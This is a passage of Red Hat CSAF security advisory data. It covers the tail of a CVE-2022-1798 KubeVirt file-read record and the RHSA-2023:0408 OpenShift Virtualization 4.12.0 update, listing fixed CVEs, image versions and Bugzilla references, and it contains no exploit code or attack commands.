"8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-10-11T16:02:33+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6890", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, ], }
rhsa-2023:0408
Vulnerability from csaf_redhat
Published
2023-01-25 11:11
Modified
2025-05-02 21:05
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update
Notes
Topic
Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:
Security Fix(es):
* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
* golang: syscall: faccessat checks wrong group (CVE-2022-29526)
* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
RHEL-8-CNV-4.12
==============
bridge-marker-container-v4.12.0-24
cluster-network-addons-operator-container-v4.12.0-24
cnv-containernetworking-plugins-container-v4.12.0-24
cnv-must-gather-container-v4.12.0-58
hco-bundle-registry-container-v4.12.0-769
hostpath-csi-driver-container-v4.12.0-30
hostpath-provisioner-container-v4.12.0-30
hostpath-provisioner-operator-container-v4.12.0-31
hyperconverged-cluster-operator-container-v4.12.0-96
hyperconverged-cluster-webhook-container-v4.12.0-96
kubemacpool-container-v4.12.0-24
kubevirt-console-plugin-container-v4.12.0-182
kubevirt-ssp-operator-container-v4.12.0-64
kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55
kubevirt-tekton-tasks-copy-template-container-v4.12.0-55
kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55
kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55
kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55
kubevirt-tekton-tasks-operator-container-v4.12.0-40
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55
kubevirt-template-validator-container-v4.12.0-32
libguestfs-tools-container-v4.12.0-255
ovs-cni-marker-container-v4.12.0-24
ovs-cni-plugin-container-v4.12.0-24
virt-api-container-v4.12.0-255
virt-artifacts-server-container-v4.12.0-255
virt-cdi-apiserver-container-v4.12.0-72
virt-cdi-cloner-container-v4.12.0-72
virt-cdi-controller-container-v4.12.0-72
virt-cdi-importer-container-v4.12.0-72
virt-cdi-operator-container-v4.12.0-72
virt-cdi-uploadproxy-container-v4.12.0-71
virt-cdi-uploadserver-container-v4.12.0-72
virt-controller-container-v4.12.0-255
virt-exportproxy-container-v4.12.0-255
virt-exportserver-container-v4.12.0-255
virt-handler-container-v4.12.0-255
virt-launcher-container-v4.12.0-255
virt-operator-container-v4.12.0-255
virtio-win-container-v4.12.0-10
vm-network-latency-checkup-container-v4.12.0-89
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nRHEL-8-CNV-4.12\n\n==============\n\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2023:0408", url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "1719190", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1719190", }, { category: "external", summary: "2023393", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2023393", }, { category: "external", summary: "2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "2040377", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2040377", }, { category: "external", summary: "2046298", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2046298", }, { category: "external", summary: "2052556", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052556", }, { category: "external", summary: "2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "2060499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060499", }, { category: "external", summary: "2069098", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069098", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2071491", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071491", }, { category: "external", summary: "2072797", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2072797", }, { category: "external", summary: "2072821", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2072821", }, { category: "external", summary: "2079916", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079916", }, { category: "external", summary: "2084085", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084085", }, { category: "external", summary: "2086285", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086285", }, { category: "external", summary: "2086551", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086551", }, { category: "external", summary: "2087724", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087724", }, { category: "external", summary: "2088129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088129", }, { category: "external", summary: "2088464", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088464", }, { category: "external", summary: "2089391", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089391", }, { category: "external", summary: "2089744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089744", }, { category: "external", summary: "2089751", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089751", }, { category: "external", summary: "2089804", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089804", }, { category: "external", summary: "2091856", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091856", }, { category: "external", summary: "2092793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092793", }, { category: "external", summary: "2092796", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092796", }, { category: "external", summary: "2093771", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093771", }, { category: "external", summary: "2093996", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093996", }, { category: "external", summary: "2094202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094202", }, { category: "external", summary: "2096285", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096285", }, { category: "external", summary: "2096780", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096780", }, { category: "external", summary: "2097436", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097436", }, { category: "external", summary: "2097586", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097586", }, { category: "external", summary: "2099556", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099556", }, { category: "external", summary: "2099573", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099573", }, { category: "external", summary: "2099923", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099923", }, { category: "external", summary: "2100290", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100290", }, { category: "external", summary: "2100436", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100436", }, { category: "external", summary: "2100442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100442", }, { category: "external", summary: "2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "2100629", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100629", }, { category: "external", summary: "2100679", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100679", }, { category: "external", summary: "2100682", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100682", }, { category: "external", summary: "2100684", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100684", }, { category: "external", summary: "2101144", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101144", }, { category: "external", summary: "2101164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101164", }, { category: "external", summary: "2101167", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101167", }, { category: "external", summary: "2101333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101333", }, { category: "external", summary: "2101335", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101335", }, { category: "external", summary: "2101390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101390", }, { category: "external", summary: "2101394", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101394", }, { category: "external", summary: "2101423", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101423", }, { category: "external", summary: "2101430", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101430", }, { category: "external", summary: "2101445", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101445", }, { category: "external", summary: "2101454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101454", }, { category: "external", summary: "2101499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101499", }, { category: "external", summary: "2101501", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101501", }, { category: "external", summary: "2101628", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101628", }, { category: "external", summary: "2101667", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101667", }, { category: "external", summary: "2101681", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101681", }, { category: "external", summary: "2102074", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102074", }, { category: "external", summary: "2102125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102125", }, { category: "external", summary: "2102132", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102132", }, { category: "external", summary: "2102138", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102138", }, { category: "external", summary: "2102256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102256", }, { category: "external", summary: "2102448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102448", }, { category: "external", summary: "2102475", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102475", }, { category: "external", summary: "2102561", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102561", }, { category: "external", summary: "2102737", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102737", }, { category: "external", summary: "2102740", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102740", }, { category: "external", summary: "2103806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103806", }, { category: "external", summary: "2103807", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103807", }, { category: "external", summary: "2103817", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103817", }, { category: "external", summary: "2103844", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103844", }, { category: "external", summary: "2104331", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104331", }, { category: "external", summary: "2104402", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104402", }, { category: "external", summary: "2104422", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104422", }, { category: "external", summary: "2104424", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104424", }, { category: "external", summary: "2104479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104479", }, { category: "external", summary: "2104480", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104480", }, { category: "external", summary: "2104785", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104785", }, { category: "external", summary: "2104859", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104859", }, { category: "external", summary: "2105257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2105257", }, { category: "external", summary: "2106175", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106175", }, { category: "external", summary: "2106963", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106963", }, { category: "external", summary: "2107279", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107279", }, { category: "external", summary: "2107342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, { category: "external", summary: "2107371", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { category: "external", summary: "2107374", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { category: "external", summary: "2107376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { category: "external", summary: "2107383", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { category: "external", summary: "2107386", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { category: "external", summary: "2107388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { category: "external", summary: "2107390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { category: "external", summary: "2107392", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { category: "external", summary: "2108339", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2108339", }, { category: "external", summary: "2108638", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2108638", }, { category: "external", summary: "2109818", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2109818", }, { category: "external", summary: "2109975", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2109975", }, { category: "external", summary: "2110256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110256", }, { category: "external", summary: "2110562", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110562", }, { category: "external", summary: "2111240", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111240", }, { category: "external", summary: "2111292", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111292", }, { category: "external", summary: "2111328", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111328", }, { category: "external", summary: "2111378", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111378", }, { category: "external", summary: "2111744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111744", }, { category: "external", summary: "2111794", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111794", }, { category: "external", summary: "2112900", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2112900", }, { category: "external", summary: "2114516", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114516", }, { category: "external", summary: "2114636", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114636", }, { category: "external", summary: "2114683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114683", }, { category: "external", summary: "2115257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115257", }, { category: "external", summary: "2115258", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115258", }, { category: "external", summary: "2115280", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115280", }, { category: "external", summary: "2115769", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115769", }, { category: "external", summary: "2116225", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2116225", }, { category: "external", summary: "2116644", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2116644", }, { category: "external", summary: "2117549", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117549", }, { category: "external", summary: "2117803", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117803", }, { category: "external", summary: "2117813", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117813", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118257", }, { category: "external", summary: "2118823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118823", }, { category: "external", summary: "2119069", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119069", }, { category: "external", summary: "2119128", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119128", }, { category: "external", summary: "2119309", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119309", }, { category: "external", summary: "2119615", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119615", }, { category: "external", summary: "2120907", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2120907", }, { category: "external", summary: "2121320", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2121320", }, { category: "external", summary: "2122236", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2122236", }, { category: "external", summary: "2122990", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2122990", }, { category: "external", summary: "2124147", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124147", }, { category: "external", summary: "2124307", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124307", }, { category: "external", summary: "2124528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124528", }, { category: "external", summary: "2124555", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124555", }, { category: "external", summary: "2124557", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124557", }, { category: "external", summary: "2124558", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124558", }, { category: "external", summary: "2124565", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124565", }, { category: "external", summary: "2124572", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124572", }, { category: "external", summary: "2124582", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124582", }, { category: "external", summary: "2124594", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124594", }, { category: "external", summary: "2124597", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124597", }, { category: "external", summary: "2126104", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2126104", }, { category: "external", summary: "2126397", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2126397", }, { category: "external", summary: "2127787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127787", }, { category: "external", summary: "2127843", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127843", }, { category: "external", summary: "2127931", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127931", }, { category: "external", summary: "2127947", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127947", }, { category: "external", summary: "2128002", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128002", }, { category: "external", summary: "2128107", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128107", }, { category: "external", summary: "2128872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128872", }, { category: "external", summary: "2128948", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128948", }, { category: "external", summary: "2128949", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128949", }, { category: "external", summary: "2128997", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128997", }, { category: "external", summary: "2129013", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129013", }, { category: "external", summary: "2129234", url: 